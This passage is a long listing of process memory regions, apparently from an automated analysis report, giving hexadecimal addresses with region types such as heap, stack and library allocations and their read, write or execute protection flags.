heap
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
75BB000
|
heap
|
page read and write
|
||
2681000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
13FEA12D000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13F81DA9000
|
trusted library allocation
|
page read and write
|
||
25AA7000
|
heap
|
page read and write
|
||
2630000
|
heap
|
page read and write
|
||
3269000
|
heap
|
page read and write
|
||
2638000
|
heap
|
page read and write
|
||
3000000
|
trusted library allocation
|
page read and write
|
||
25AA3000
|
heap
|
page read and write
|
||
2677000
|
heap
|
page read and write
|
||
7FF8879D4000
|
trusted library allocation
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
7FF887CB0000
|
trusted library allocation
|
page read and write
|
||
3050000
|
heap
|
page readonly
|
||
321E000
|
heap
|
page read and write
|
||
90D0000
|
direct allocation
|
page execute and read and write
|
||
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
2675000
|
heap
|
page read and write
|
||
44C0000
|
heap
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
3384000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
267C000
|
heap
|
page read and write
|
||
245F8000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
13FEA176000
|
heap
|
page read and write
|
||
4ED9000
|
heap
|
page read and write
|
||
F20000
|
trusted library section
|
page read and write
|
||
752E000
|
heap
|
page read and write
|
||
53EB000
|
trusted library allocation
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
83E0000
|
trusted library allocation
|
page read and write
|
||
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
2A3F000
|
stack
|
page read and write
|
||
2651000
|
heap
|
page read and write
|
||
338D000
|
heap
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
B4478B000
|
stack
|
page read and write
|
||
2698000
|
heap
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
43A8000
|
heap
|
page read and write
|
||
870F000
|
heap
|
page read and write
|
||
13F81D99000
|
trusted library allocation
|
page read and write
|
||
13FEA1FA000
|
heap
|
page read and write
|
||
13F80BB8000
|
trusted library allocation
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
2FC0000
|
trusted library section
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
8A10000
|
direct allocation
|
page read and write
|
||
23E5000
|
heap
|
page read and write
|
||
8400000
|
trusted library allocation
|
page read and write
|
||
7278000
|
heap
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
43BA000
|
heap
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
24020000
|
remote allocation
|
page read and write
|
||
2698000
|
heap
|
page read and write
|
||
13FE9F51000
|
heap
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
7FF887D10000
|
trusted library allocation
|
page read and write
|
||
83D0000
|
trusted library allocation
|
page read and write
|
||
ACD000
|
stack
|
page read and write
|
||
7260000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
502F000
|
stack
|
page read and write
|
||
7FF887C60000
|
trusted library allocation
|
page read and write
|
||
326B000
|
heap
|
page read and write
|
||
24657000
|
heap
|
page read and write
|
||
9DE000
|
heap
|
page read and write
|
||
2681000
|
heap
|
page read and write
|
||
8410000
|
trusted library allocation
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
2648000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
7FF8879D0000
|
trusted library allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
B435FB000
|
stack
|
page read and write
|
||
13F80BAC000
|
trusted library allocation
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
2644000
|
heap
|
page read and write
|
||
23CE000
|
stack
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
338D000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
4AA8000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
43AC000
|
heap
|
page read and write
|
||
268F000
|
heap
|
page read and write
|
||
89D0000
|
trusted library allocation
|
page execute and read and write
|
||
7080000
|
direct allocation
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
B4460F000
|
stack
|
page read and write
|
||
43B1000
|
heap
|
page read and write
|
||
8300000
|
trusted library allocation
|
page read and write
|
||
268F000
|
heap
|
page read and write
|
||
13F81F86000
|
trusted library allocation
|
page read and write
|
||
2648000
|
heap
|
page read and write
|
||
268C000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
870B000
|
heap
|
page read and write
|
||
13FE9F30000
|
heap
|
page read and write
|
||
7FF887B8A000
|
trusted library allocation
|
page read and write
|
||
13FE9C60000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
4A9F000
|
unkown
|
page read and write
|
||
318C000
|
heap
|
page read and write
|
||
2682000
|
heap
|
page read and write
|
||
70B0000
|
direct allocation
|
page read and write
|
||
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
5BC4000
|
trusted library allocation
|
page read and write
|
||
4A90000
|
heap
|
page read and write
|
||
269C000
|
heap
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
48C0000
|
heap
|
page read and write
|
||
2678000
|
heap
|
page read and write
|
||
98C000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page readonly
|
||
8AA4000
|
heap
|
page read and write
|
||
7FF887D20000
|
trusted library allocation
|
page read and write
|
||
530E000
|
trusted library allocation
|
page read and write
|
||
245F8000
|
heap
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
7FF8879D3000
|
trusted library allocation
|
page execute and read and write
|
||
13FE7E31000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
25596000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
301A000
|
trusted library allocation
|
page execute and read and write
|
||
8A44000
|
heap
|
page read and write
|
||
81A000
|
heap
|
page read and write
|
||
2678000
|
heap
|
page read and write
|
||
2698000
|
heap
|
page read and write
|
||
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
13FE7E27000
|
heap
|
page read and write
|
||
7FF887B90000
|
trusted library allocation
|
page execute and read and write
|
||
2D94000
|
heap
|
page read and write
|
||
13F80511000
|
trusted library allocation
|
page read and write
|
||
74CE000
|
stack
|
page read and write
|
||
13F8049B000
|
trusted library allocation
|
page read and write
|
||
28FF000
|
stack
|
page read and write
|
||
794B000
|
stack
|
page read and write
|
||
B434FE000
|
stack
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
7FF8879DD000
|
trusted library allocation
|
page execute and read and write
|
||
2B0E000
|
stack
|
page read and write
|
||
265B000
|
heap
|
page read and write
|
||
13F90001000
|
trusted library allocation
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
B43A3F000
|
stack
|
page read and write
|
||
13FEA0F0000
|
heap
|
page execute and read and write
|
||
7FF887A8C000
|
trusted library allocation
|
page execute and read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
25AA9000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
4AD3000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
893D000
|
stack
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
25595000
|
heap
|
page read and write
|
||
4B77000
|
trusted library allocation
|
page read and write
|
||
43BA000
|
heap
|
page read and write
|
||
D4E000
|
stack
|
page read and write
|
||
24681000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
8A84000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
442E000
|
stack
|
page read and write
|
||
51C000
|
stack
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
266D000
|
heap
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
307A000
|
heap
|
page read and write
|
||
CE06000
|
direct allocation
|
page execute and read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7FF887C50000
|
trusted library allocation
|
page read and write
|
||
7FF887C70000
|
trusted library allocation
|
page read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
B438B7000
|
stack
|
page read and write
|
||
7FF887D50000
|
trusted library allocation
|
page read and write
|
||
7602000
|
heap
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
13FEA1B3000
|
heap
|
page read and write
|
||
B4468E000
|
stack
|
page read and write
|
||
13F90021000
|
trusted library allocation
|
page read and write
|
||
755000
|
stack
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
25C0000
|
heap
|
page read and write
|
||
13FE9720000
|
trusted library allocation
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
13FE9EC0000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
3025000
|
trusted library allocation
|
page execute and read and write
|
||
267B000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13F81A39000
|
trusted library allocation
|
page read and write
|
||
6EDF000
|
stack
|
page read and write
|
||
2699000
|
heap
|
page read and write
|
||
13F80703000
|
trusted library allocation
|
page read and write
|
||
253D000
|
stack
|
page read and write
|
||
13F8049F000
|
trusted library allocation
|
page read and write
|
||
268D000
|
heap
|
page read and write
|
||
77BE000
|
stack
|
page read and write
|
||
13FE7EF0000
|
heap
|
page read and write
|
||
8420000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
43AE000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
31D1000
|
heap
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
13FEA1E7000
|
heap
|
page read and write
|
||
13F902EB000
|
trusted library allocation
|
page read and write
|
||
269A000
|
heap
|
page read and write
|
||
86D0000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
13FE9B20000
|
trusted library allocation
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
13F806BD000
|
trusted library allocation
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
2696000
|
heap
|
page read and write
|
||
2559D000
|
heap
|
page read and write
|
||
13F804F9000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
4AC9000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2674000
|
heap
|
page read and write
|
||
554000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
7544000
|
heap
|
page read and write
|
||
13FE7E80000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
7535000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
715A000
|
stack
|
page read and write
|
||
2B46000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
BCD000
|
stack
|
page read and write
|
||
7FF887A90000
|
trusted library allocation
|
page execute and read and write
|
||
7830000
|
trusted library allocation
|
page execute and read and write
|
||
8A37000
|
heap
|
page read and write
|
||
13FE9F15000
|
heap
|
page read and write
|
||
4DC2000
|
heap
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
499E000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
2696000
|
heap
|
page read and write
|
||
13FE7E6C000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
B006000
|
direct allocation
|
page execute and read and write
|
||
13FEA11D000
|
heap
|
page read and write
|
||
5BB1000
|
trusted library allocation
|
page read and write
|
||
4A21000
|
trusted library allocation
|
page read and write
|
||
B439B9000
|
stack
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13FEA11F000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
BA06000
|
direct allocation
|
page execute and read and write
|
||
7DF4FD240000
|
trusted library allocation
|
page execute and read and write
|
||
7070000
|
direct allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
43B1000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
B43ABE000
|
stack
|
page read and write
|
||
13FEA0F7000
|
heap
|
page execute and read and write
|
||
43A0000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
302A000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
89C0000
|
direct allocation
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4DCC000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
7FF887B81000
|
trusted library allocation
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
3040000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
49FF000
|
stack
|
page read and write
|
||
5040000
|
trusted library allocation
|
page read and write
|
||
2686000
|
heap
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
70C0000
|
direct allocation
|
page read and write
|
||
4AA9000
|
heap
|
page read and write
|
||
7880000
|
trusted library allocation
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
B431EE000
|
stack
|
page read and write
|
||
83B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887AB6000
|
trusted library allocation
|
page execute and read and write
|
||
43A9000
|
heap
|
page read and write
|
||
25FB1000
|
heap
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
2DA000
|
stack
|
page read and write
|
||
705B000
|
stack
|
page read and write
|
||
8940000
|
trusted library allocation
|
page read and write
|
||
EBE000
|
stack
|
page read and write
|
||
269B000
|
heap
|
page read and write
|
||
2657000
|
heap
|
page read and write
|
||
7860000
|
trusted library allocation
|
page read and write
|
||
13FE9D80000
|
heap
|
page execute and read and write
|
||
725B000
|
stack
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
13FE7E73000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
7FF887BB2000
|
trusted library allocation
|
page read and write
|
||
84C5000
|
trusted library allocation
|
page read and write
|
||
43C1000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
89E0000
|
direct allocation
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
3384000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
89B0000
|
direct allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
95E000
|
unkown
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
4ABE000
|
heap
|
page read and write
|
||
43B1000
|
heap
|
page read and write
|
||
24605000
|
heap
|
page read and write
|
||
2675000
|
heap
|
page read and write
|
||
7FF887D40000
|
trusted library allocation
|
page read and write
|
||
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
13F815B8000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
25596000
|
heap
|
page read and write
|
||
13FE9E20000
|
heap
|
page execute and read and write
|
||
503E000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
B436FE000
|
stack
|
page read and write
|
||
5A21000
|
trusted library allocation
|
page read and write
|
||
24820000
|
heap
|
page read and write
|
||
4A7A000
|
trusted library allocation
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
30C8000
|
trusted library allocation
|
page read and write
|
||
5031000
|
heap
|
page read and write
|
||
13FE97D0000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
43BA000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
86F8000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
13FE7E2D000
|
heap
|
page read and write
|
||
7FF887BA0000
|
trusted library allocation
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
5026000
|
trusted library allocation
|
page read and write
|
||
8610000
|
heap
|
page read and write
|
||
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
7FF8879D2000
|
trusted library allocation
|
page read and write
|
||
293E000
|
stack
|
page read and write
|
||
85CC000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
2674000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
24020000
|
remote allocation
|
page read and write
|
||
2FED000
|
trusted library allocation
|
page execute and read and write
|
||
267B000
|
heap
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
B43937000
|
stack
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
13FE9EC2000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
2645000
|
heap
|
page read and write
|
||
266D000
|
heap
|
page read and write
|
||
89A0000
|
direct allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
3383000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
2689000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
4DCD000
|
heap
|
page read and write
|
||
13F80001000
|
trusted library allocation
|
page read and write
|
||
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
8A96000
|
heap
|
page read and write
|
||
777F000
|
stack
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
25592000
|
heap
|
page read and write
|
||
83AE000
|
stack
|
page read and write
|
||
43B0000
|
heap
|
page read and write
|
||
24681000
|
heap
|
page read and write
|
||
13F9000F000
|
trusted library allocation
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2697000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
4C92000
|
heap
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
245F8000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
98C000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
5A49000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
4380000
|
heap
|
page read and write
|
||
257D000
|
stack
|
page read and write
|
||
7FF887BB7000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
2FF8000
|
heap
|
page read and write
|
||
2F5A000
|
heap
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4A90000
|
trusted library allocation
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
74F0000
|
heap
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
25591000
|
heap
|
page read and write
|
||
48C6000
|
heap
|
page read and write
|
||
13F8048D000
|
trusted library allocation
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
25FBB000
|
heap
|
page read and write
|
||
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
30FF000
|
unkown
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
70A0000
|
direct allocation
|
page read and write
|
||
13FE7C80000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
13F80B81000
|
trusted library allocation
|
page read and write
|
||
6E9E000
|
stack
|
page read and write
|
||
4AD3000
|
heap
|
page read and write
|
||
2657000
|
heap
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
31BF000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
24614000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
13FE7D80000
|
heap
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
25FB5000
|
heap
|
page read and write
|
||
2DBE000
|
unkown
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
C406000
|
direct allocation
|
page execute and read and write
|
||
350000
|
heap
|
page read and write
|
||
B4367E000
|
stack
|
page read and write
|
||
13FE9760000
|
heap
|
page readonly
|
||
6F4E000
|
stack
|
page read and write
|
||
267D000
|
heap
|
page read and write
|
||
13F81D81000
|
trusted library allocation
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
B43166000
|
stack
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
2651000
|
heap
|
page read and write
|
||
7FF887BC0000
|
trusted library allocation
|
page execute and read and write
|
||
2CAC000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4AA1000
|
heap
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page read and write
|
||
43CE000
|
heap
|
page read and write
|
||
24581000
|
heap
|
page read and write
|
||
13FEA1F6000
|
heap
|
page read and write
|
||
82F0000
|
trusted library allocation
|
page read and write
|
||
5407000
|
trusted library allocation
|
page read and write
|
||
13FE7EF5000
|
heap
|
page read and write
|
||
8707000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13F80483000
|
trusted library allocation
|
page read and write
|
||
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
5A86000
|
trusted library allocation
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
7FF887AF0000
|
trusted library allocation
|
page execute and read and write
|
||
D68000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
C5C000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
4AA9000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
31FD000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
24581000
|
heap
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
267E000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
B43C3B000
|
stack
|
page read and write
|
||
13FEA1D4000
|
heap
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
B43B3E000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13FEA100000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
97E000
|
unkown
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
265A000
|
heap
|
page read and write
|
||
268A000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
13FEA182000
|
heap
|
page read and write
|
||
13F81E9B000
|
trusted library allocation
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
719E000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
13FE7F60000
|
heap
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
8A43000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
751E000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
25FBD000
|
heap
|
page read and write
|
||
2650000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
86BA000
|
heap
|
page read and write
|
||
30E0000
|
trusted library allocation
|
page read and write
|
||
13F81D86000
|
trusted library allocation
|
page read and write
|
||
266C000
|
heap
|
page read and write
|
||
71C000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
32CF000
|
stack
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
7FF8879EB000
|
trusted library allocation
|
page read and write
|
||
13FE7E43000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
83F0000
|
trusted library allocation
|
page read and write
|
||
9206000
|
direct allocation
|
page execute and read and write
|
||
13FE7E2B000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
267E000
|
heap
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
82D7000
|
stack
|
page read and write
|
||
13FE9E74000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
305E000
|
heap
|
page read and write
|
||
1DB000
|
stack
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page readonly
|
||
6F00000
|
heap
|
page execute and read and write
|
||
545A000
|
trusted library allocation
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
B4383E000
|
stack
|
page read and write
|
||
13FE9750000
|
trusted library allocation
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
2686000
|
heap
|
page read and write
|
||
6A5C000
|
stack
|
page read and write
|
||
3383000
|
heap
|
page read and write
|
||
2FE3000
|
trusted library allocation
|
page execute and read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
3022000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2FE4000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2686000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
25590000
|
heap
|
page read and write
|
||
2681000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
13FE7E23000
|
heap
|
page read and write
|
||
25591000
|
heap
|
page read and write
|
||
4AF6000
|
